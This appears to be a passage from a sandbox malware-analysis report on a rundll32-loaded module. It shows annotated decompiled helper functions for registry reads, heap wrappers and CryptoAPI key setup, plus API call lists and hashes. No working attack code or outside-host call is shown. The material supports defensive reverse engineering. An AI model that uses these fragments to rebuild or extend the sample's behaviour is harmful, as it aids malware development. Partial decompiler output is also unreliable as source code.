                                                          				_t17 = E00E53969(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed; 0x80000002 == HKEY_LOCAL_MACHINE; _a8/_a12 read as key path and value name (inferred from the call shape, not confirmed by the report)
                                                          				if(_t17 < 0) {
                                                          					_t23 = _t17; // propagate the failing HRESULT
                                                          				} else {
                                                          					if(_v20 != 8) { // 8 == VT_BSTR: anything but a string is rejected
                                                          						_t23 = 1;
                                                          					} else {
                                                          						_t19 = E00E57206(_t20, _v12); // copy the BSTR into a heap buffer (subcall uses lstrlenW/memcpy/memset)
                                                          						if(_t19 == 0) {
                                                          							_t23 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                          						} else {
                                                          							 *_a16 = _t19;
                                                          						}
                                                          						__imp__#6(_v12); // OLEAUT32 ordinal 6 == SysFreeString (see the APIs list below)
                                                          					}
                                                          				}
                                                          				return _t23;
                                                          			}
                                                          Statement addresses for the listing above (shown beside each decompiled line in the original report; flattened by extraction): 0x00e55edc to 0x00e55f4c

                                                          APIs
                                                            • Part of subcall function 00E53969: SysFreeString.OLEAUT32(?), ref: 00E53A48
                                                            • Part of subcall function 00E57206: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00E567B6,004F0053,00000000,?), ref: 00E5720F
                                                            • Part of subcall function 00E57206: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00E567B6,004F0053,00000000,?), ref: 00E57239
                                                            • Part of subcall function 00E57206: memset.NTDLL ref: 00E5724D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E55F38
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeString$lstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 397948122-0
                                                          • Opcode ID: bfbe14b0c19e73e98c5a344f43ac4b899657e47d34cdcc9acd5cee96e876907e
                                                          • Instruction ID: aa70cf6affcb2362a920273a534b2104a9aa56f8293eca775c9f1072113d7eb4
                                                          • Opcode Fuzzy Hash: bfbe14b0c19e73e98c5a344f43ac4b899657e47d34cdcc9acd5cee96e876907e
                                                          • Instruction Fuzzy Hash: 84019E32600529FFDB219FA8CC04DAEBBB8FB04711F001C65F901F6021D3B099198BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			// Decompiler output. Editor's reading: __esi points to a small context struct whose fields
                                                          			// at +0, +4, +8 and +0xc are passed straight through; _a4 is a buffer of __eax bytes.
                                                          			// The buffer is rendered as a comma-separated decimal list by E00E56FEA, handed to
                                                          			// E00E515AB together with a relocated string constant, then freed. Returns a Win32 error code.
                                                          			E00E55963(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                                                          				char _v8;
                                                          				void* _t14;
                                                          				intOrPtr _t17;
                                                          				void* _t20;
                                                          				void* _t26;
                                                          
                                                          				_push(__ecx);
                                                          				if(_a4 == 0 || __eax == 0) {
                                                          					_t26 = 0x57; // ERROR_INVALID_PARAMETER
                                                          				} else {
                                                          					_t14 = E00E56FEA(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed; the _a4 slot is reused to receive the heap string, _v8 gets its length
                                                          					_t26 = _t14;
                                                          					if(_t26 == 0) {
                                                          						_t17 =  *0xe5a2d4; // 0x435d5a8
                                                          						_t9 = _t17 + 0xe5b9e8; // 0x444f4340
                                                          						_t20 = E00E515AB( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed; subcall runs lstrlen/StrStrA/RtlAllocateHeap over the list
                                                          						_t26 = _t20;
                                                          						RtlFreeHeap( *0xe5a290, 0, _a4); // executed; release the list built by E00E56FEA
                                                          					}
                                                          				}
                                                          				return _t26;
                                                          			}
                                                          Statement addresses for the listing above (shown beside each decompiled line in the original report; flattened by extraction): 0x00e55966 to 0x00e559c8

                                                          APIs
                                                            • Part of subcall function 00E56FEA: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00E57002
                                                            • Part of subcall function 00E515AB: lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 00E515DF
                                                            • Part of subcall function 00E515AB: StrStrA.SHLWAPI(00000000,?), ref: 00E515EC
                                                            • Part of subcall function 00E515AB: RtlAllocateHeap.NTDLL(00000000,?), ref: 00E5160B
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00E577F2), ref: 00E559B9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Allocate$Freelstrlen
                                                          • String ID:
                                                          • API String ID: 2220322926-0
                                                          • Opcode ID: 2f772be7b0fe88cceeb44a7dedb9ea3085d0a0290df419d02dc376b759efd87d
                                                          • Instruction ID: c3effbd8ac091e997a78193412cad521fae10f0209f84ece18b6cbcf5fa22d3c
                                                          • Opcode Fuzzy Hash: 2f772be7b0fe88cceeb44a7dedb9ea3085d0a0290df419d02dc376b759efd87d
                                                          • Instruction Fuzzy Hash: 2C016D76200608FFCB16CF45CC51EAA7BE9EB84356F104925FA19A6160E731EA48EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05583AEA: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0559C140,00000000,0557CC8B,?,0557CD20,?), ref: 05583B09
                                                            • Part of subcall function 05583AEA: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0559C140,00000000,0557CC8B,?,0557CD20,?), ref: 05583B14
                                                            • Part of subcall function 05583AEA: _wcsupr.NTDLL ref: 05583B21
                                                            • Part of subcall function 05583AEA: lstrlenW.KERNEL32(00000000), ref: 05583B29
                                                          • ResumeThread.KERNEL32(00000004,?,0557CD20,?), ref: 0557CC99
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                                          • String ID:
                                                          • API String ID: 3646851950-0
                                                          • Opcode ID: 72e55b0aa7990ccee1b26419e9b8c230f8899fd4dfa50ca1a9ab0aaf3656effe
                                                          • Instruction ID: f242feb5af61cdb17cc7b0f25f7c3f94c913e0a189d2abc7c83430a20bf10c6f
                                                          • Opcode Fuzzy Hash: 72e55b0aa7990ccee1b26419e9b8c230f8899fd4dfa50ca1a9ab0aaf3656effe
                                                          • Instruction Fuzzy Hash: EBD05E30204305EADB216B50EE09B2A7E967F50B84F008865F99690560CB369D24A505
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0559466C
                                                            • Part of subcall function 0559477C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002858C,05570000), ref: 055947F5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                                          • String ID:
                                                          • API String ID: 123106877-0
                                                          • Opcode ID: c279f0e3086216ce461140bb70faa6708d5d05114f22addccd48f3f9ef3fa7b5
                                                          • Instruction ID: 099f9382945a79453bf8f0ddaeecfffdc2ad5fce7a4c606cfbcd831eb2ff54b2
                                                          • Opcode Fuzzy Hash: c279f0e3086216ce461140bb70faa6708d5d05114f22addccd48f3f9ef3fa7b5
                                                          • Instruction Fuzzy Hash: B7A002E6255145FC3F1C52555D55C37015DF4DA9153744559F4019405095581C475475
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0559466C
                                                            • Part of subcall function 0559477C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002858C,05570000), ref: 055947F5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                                          • String ID:
                                                          • API String ID: 123106877-0
                                                          • Opcode ID: c66adc8a6fd28b04724ab2ebef1b93c2cf0a6b0472c129f2a6ad575095d88075
                                                          • Instruction ID: 0cc006909524499fe12868382734ab71cc2cb25df6c5f8ad42726cf33e320679
                                                          • Opcode Fuzzy Hash: c66adc8a6fd28b04724ab2ebef1b93c2cf0a6b0472c129f2a6ad575095d88075
                                                          • Instruction Fuzzy Hash: E9A002E6259146FC3F1C52555D55C37015DF4DD9513744959E4018405095581C475475
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 0add2686fee542ddb79956b11be98b6743e0de9b681ab17d9b15a7e3270ea82f
                                                          • Instruction ID: 1d4eb9b8903098ec7f24e6a00373b974862f2e66f99251cfb0971f5035aebd0d
                                                          • Opcode Fuzzy Hash: 0add2686fee542ddb79956b11be98b6743e0de9b681ab17d9b15a7e3270ea82f
                                                          • Instruction Fuzzy Hash: 02B01231014100EBDA014B01EE07F097F21A750700F034012B204400A08A39146CFF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: bb87fb7f4a6b3dfe1d2eec2b600e86e1d80d9eebbc42ef01565983e169a415dc
                                                          • Instruction ID: 608caa8e64feef7e5bfd981220d95f10553d3fad51174819a157406da496e503
                                                          • Opcode Fuzzy Hash: bb87fb7f4a6b3dfe1d2eec2b600e86e1d80d9eebbc42ef01565983e169a415dc
                                                          • Instruction Fuzzy Hash: 22B01231014100EBDA114B00EE07F097F21A750700F034412B204400A08A39546CFF04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			// Heap-free wrapper: releases a block on the module's private heap, whose
                                                          			// handle is kept in the global at 0xe5a290 (RtlFreeHeap ref 00E513D8 below).
                                                          			E00E513CC(void* _a4) {
                                                          				char _t2;
                                                          
                                                          				_t2 = RtlFreeHeap( *0xe5a290, 0, _a4); // executed
                                                          				return _t2;
                                                          			}





                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: eb92f13c2560135a4d36eea41ff34b3415314637cf56b270e6599fd789cc9e8f
                                                          • Instruction ID: 034cb901fd48e1a924b91ec9e159000090819e3d1d204dbef17af78cd13eb205
                                                          • Opcode Fuzzy Hash: eb92f13c2560135a4d36eea41ff34b3415314637cf56b270e6599fd789cc9e8f
                                                          • Instruction Fuzzy Hash: B8B01275104300EFCB264B02DE05F057B22B750B02F004C20F308200B082320424FB17
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			// Heap-alloc wrapper: allocates _a4 bytes from the module's private heap,
                                                          			// whose handle is kept in the global at 0xe5a290 (RtlAllocateHeap ref 00E55FC8 below).
                                                          			E00E55FBC(long _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = RtlAllocateHeap( *0xe5a290, 0, _a4); // executed
                                                          				return _t2;
                                                          			}





                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 9bcbd1b3a6ba1a03661dea50132423950c7f59aa84dc8ac329a01e5cd56ac96a
                                                          • Instruction ID: 03bd4934036b673b807305557d30392a3e86a8748d76a3956ffb8f351656a542
                                                          • Opcode Fuzzy Hash: 9bcbd1b3a6ba1a03661dea50132423950c7f59aa84dc8ac329a01e5cd56ac96a
                                                          • Instruction Fuzzy Hash: D2B01235014300EFCE164B01DD05F067B32B750B02F104C20B204200B083320424EB06
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055750C7: RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                            • Part of subcall function 055750C7: RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                            • Part of subcall function 055750C7: RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                            • Part of subcall function 055750C7: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          • HeapFree.KERNEL32(00000000,055729E6,00000000,?,055729E6,00000000,?,?,?,?,?,?,055729E6,00000000), ref: 05588607
                                                            • Part of subcall function 05577BD5: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,05581FA4,?,00000001,?,00000000,00000001,00000000), ref: 05577BF8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                                          • String ID:
                                                          • API String ID: 1301464996-0
                                                          • Opcode ID: 3b163454cb822d7ab547ed6e670e55a444c072fdb16dc377cfe550b6ea097448
                                                          • Instruction ID: a52bc8826e04f7e12ebefc6442fd981fc38d9c0d12ae965bca0a44341e8bba64
                                                          • Opcode Fuzzy Hash: 3b163454cb822d7ab547ed6e670e55a444c072fdb16dc377cfe550b6ea097448
                                                          • Instruction Fuzzy Hash: 9811E071710201FBDB14EB89E8A1EBDBBA9FB48310F41082AF506BB241DB74AD08DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memcpy.NTDLL(00000000,0559C214,00000018,05573A05,059B8E6E,?,05573A05,059B8E6E,?,05573A05,059B8E6E,?,00000000,00000000,?,05573A05), ref: 0557E625
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID:
                                                          • API String ID: 3510742995-0
                                                          • Opcode ID: 07814b31e5c6120db9eae0252d681acb6160dd34e2dc483a02c1c046bdea41e0
                                                          • Instruction ID: d6b2abbeb68ad4ad5af2492383175caf454822c4bbcc60b6119ed638b05081e9
                                                          • Opcode Fuzzy Hash: 07814b31e5c6120db9eae0252d681acb6160dd34e2dc483a02c1c046bdea41e0
                                                          • Instruction Fuzzy Hash: EC11B172620109AFCF14DFD5F847C65BFADF785250B064123F58A87260EA386D08EB74
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055750C7: RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                            • Part of subcall function 055750C7: RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                            • Part of subcall function 055750C7: RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                            • Part of subcall function 055750C7: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 05580CDF
                                                            • Part of subcall function 05585DF9: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05580CCA,00000000,?,00000000,?,?,?,?,?,?), ref: 05585E0B
                                                            • Part of subcall function 05585DF9: StrChrA.SHLWAPI(?,00000020,?,00000000,05580CCA,00000000,?,00000000,?,?,?,?,?,?), ref: 05585E1A
                                                            • Part of subcall function 05591E10: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 05591E36
                                                            • Part of subcall function 05591E10: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05591E42
                                                            • Part of subcall function 05591E10: GetModuleHandleA.KERNEL32(?,059B9732,00000000,?,00000000), ref: 05591E62
                                                            • Part of subcall function 05591E10: GetProcAddress.KERNEL32(00000000), ref: 05591E69
                                                            • Part of subcall function 05591E10: Thread32First.KERNEL32(?,0000001C), ref: 05591E79
                                                            • Part of subcall function 05591E10: CloseHandle.KERNEL32(?), ref: 05591EC1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                                          • String ID:
                                                          • API String ID: 2627809124-0
                                                          • Opcode ID: 9905c5908c9a3bff565c1b469f496503df36944c7a4c8b1c788e20fdca7399f3
                                                          • Instruction ID: 4baf706d74932f4a4bec633f1e2f49e922774e13b66868dad9567dcbae9ab812
                                                          • Opcode Fuzzy Hash: 9905c5908c9a3bff565c1b469f496503df36944c7a4c8b1c788e20fdca7399f3
                                                          • Instruction Fuzzy Hash: E9017C71624119FFDB01ABA8ED89CBFBBEDFB45254711015AB401A3110EA35AE09AB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055750C7: RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                            • Part of subcall function 055750C7: RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                            • Part of subcall function 055750C7: RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                            • Part of subcall function 055750C7: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0558DAE4
                                                            • Part of subcall function 05585DF9: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05580CCA,00000000,?,00000000,?,?,?,?,?,?), ref: 05585E0B
                                                            • Part of subcall function 05585DF9: StrChrA.SHLWAPI(?,00000020,?,00000000,05580CCA,00000000,?,00000000,?,?,?,?,?,?), ref: 05585E1A
                                                            • Part of subcall function 05581486: lstrlen.KERNEL32(?,00000000,00000000,75145520,?,?,?,0557D50C,0000001C,00000000,00000000), ref: 055814B6
                                                            • Part of subcall function 05581486: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 055814CC
                                                            • Part of subcall function 05581486: memcpy.NTDLL(00000010,?,00000000,?,?,?,0557D50C,0000001C), ref: 05581502
                                                            • Part of subcall function 05581486: memcpy.NTDLL(00000010,00000000,0557D50C,?,?,?,0557D50C), ref: 0558151D
                                                            • Part of subcall function 05581486: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0558153B
                                                            • Part of subcall function 05581486: GetLastError.KERNEL32(?,?,?,0557D50C), ref: 05581545
                                                            • Part of subcall function 05581486: HeapFree.KERNEL32(00000000,00000000,?,?,?,0557D50C), ref: 05581568
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                                          • String ID:
                                                          • API String ID: 730886825-0
                                                          • Opcode ID: b3ad639a19fb015bdab855cf77da941fd9c658c0894cc942768aaf15de48b63b
                                                          • Instruction ID: f257e174da83964d18e731df54282e91f1fb63b1e5047906b96c5fc724019631
                                                          • Opcode Fuzzy Hash: b3ad639a19fb015bdab855cf77da941fd9c658c0894cc942768aaf15de48b63b
                                                          • Instruction Fuzzy Hash: A9017131624205FBDB21EB54ED0AFAE7BFCFB46754F154056B501B3180DA74AA04EBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			// Fetches a buffer through E00E53B91 and hands it back to the caller via *__edi
                                                          			// as a NUL-terminated wide string on the module's private heap (*0xe5a290).
                                                          			// Returns 0 on success, otherwise a non-zero error code.
                                                          			E00E511B0(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                                                          				void* _t24;
                                                          				signed short _t25;
                                                          				signed int _t27;
                                                          				intOrPtr* _t28;
                                                          				signed short _t29;
                                                          
                                                          				_t28 = __edi;
                                                          				if(_a4 == 0) {
                                                          					L2:
                                                          					// 0x80000002 is the HKEY_LOCAL_MACHINE handle value; E00E53B91 fills in
                                                          					// _a4 (output buffer) and _a12 (its size in bytes).
                                                          					_t29 = E00E53B91(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                          					if(_t29 == 0) {
                                                          						_t27 = _a12 >> 1; // byte count -> WCHAR count
                                                          						if(_t27 == 0) {
                                                          							_t29 = 2; // empty result: return error 2 (ERROR_FILE_NOT_FOUND) and release the buffer
                                                          							HeapFree( *0xe5a290, 0, _a4);
                                                          						} else {
                                                          							_t24 = _a4;
                                                          							// _t29 is 0 here, so this clears the last WCHAR: NUL-terminates the string
                                                          							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                                                          							 *_t28 = _t24; // pass the buffer back to the caller
                                                          						}
                                                          					}
                                                          					L6:
                                                          					return _t29;
                                                          				}
                                                          				// Non-NULL _a4: try E00E55ED2 first (it uses SysFreeString, see APIs below);
                                                          				// on success (0) return at once, otherwise fall back to the L2 path.
                                                          				_t25 = E00E55ED2(_a4, _a8, _a12, __edi); // executed
                                                          				_t29 = _t25;
                                                          				if(_t29 == 0) {
                                                          					goto L6;
                                                          				}
                                                          				goto L2;
                                                          			}









                                                          APIs
                                                            • Part of subcall function 00E55ED2: SysFreeString.OLEAUT32(00000000), ref: 00E55F38
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7519F710,?,00000000,?,00000000,?,00E55372,?,004F0053,051B9318,00000000,?), ref: 00E51211
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Free$HeapString
                                                          • String ID:
                                                          • API String ID: 3806048269-0
                                                          • Opcode ID: edb787c4bbc7ea7e8975690f312019a59feab1c0dfb41aa340e9752363de9d2d
                                                          • Instruction ID: 1a282f17717c68f739cd2422d068f621411ec158c3feb04484ed78ae0c72e82c
                                                          • Opcode Fuzzy Hash: edb787c4bbc7ea7e8975690f312019a59feab1c0dfb41aa340e9752363de9d2d
                                                          • Instruction Fuzzy Hash: 95014B36040619BBCB229F84CC02FEA3BA5FB44792F049868FE04AA120C731CD64EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			// Measures the input with lstrlen, sets up a CryptoAPI key through E00E53276
                                                          			// (CryptAcquireContextW / CryptImportKey / CryptSetKeyParam, see APIs below),
                                                          			// then allocates a buffer of twice the length with E00E55FBC and passes it to
                                                          			// E00E561A5. Returns the new buffer, or 0 on failure. The input buffer is freed.
                                                          			E00E56E5D(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                                          				void* _t11;
                                                          				void* _t13;
                                                          				void* _t21;
                                                          				void* _t23; // register-passed argument the decompiler did not resolve
                                                          
                                                          				_t11 =  &_a4;
                                                          				_t21 = 0;
                                                          				__imp__( &_a8); // lstrlen.KERNEL32, ref 00E56E6E
                                                          				_t13 = E00E53276( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                                          				if(_t13 == 0) {
                                                          					_t21 = E00E55FBC(_a8 + _a8); // heap-allocate 2 * length bytes
                                                          					if(_t21 != 0) {
                                                          						E00E561A5(_a4, _t21, _t23);
                                                          					}
                                                          					E00E513CC(_a4); // free the input buffer
                                                          				}
                                                          				return _t21;
                                                          			}






                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00E54A9F,00000000,?,00E571BA,00000000,00E54A9F,?,00000000,00E54A9F,00000000,051B9630), ref: 00E56E6E
                                                            • Part of subcall function 00E53276: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00E56E82,00000001,00E54A9F,00000000), ref: 00E532AE
                                                            • Part of subcall function 00E53276: memcpy.NTDLL(00E56E82,00E54A9F,00000010,?,?,?,00E56E82,00000001,00E54A9F,00000000,?,00E571BA,00000000,00E54A9F,?,00000000), ref: 00E532C7
                                                            • Part of subcall function 00E53276: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00E532F0
                                                            • Part of subcall function 00E53276: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00E53308
                                                            • Part of subcall function 00E53276: memcpy.NTDLL(00000000,00000000,051B9630,00000010), ref: 00E5335A
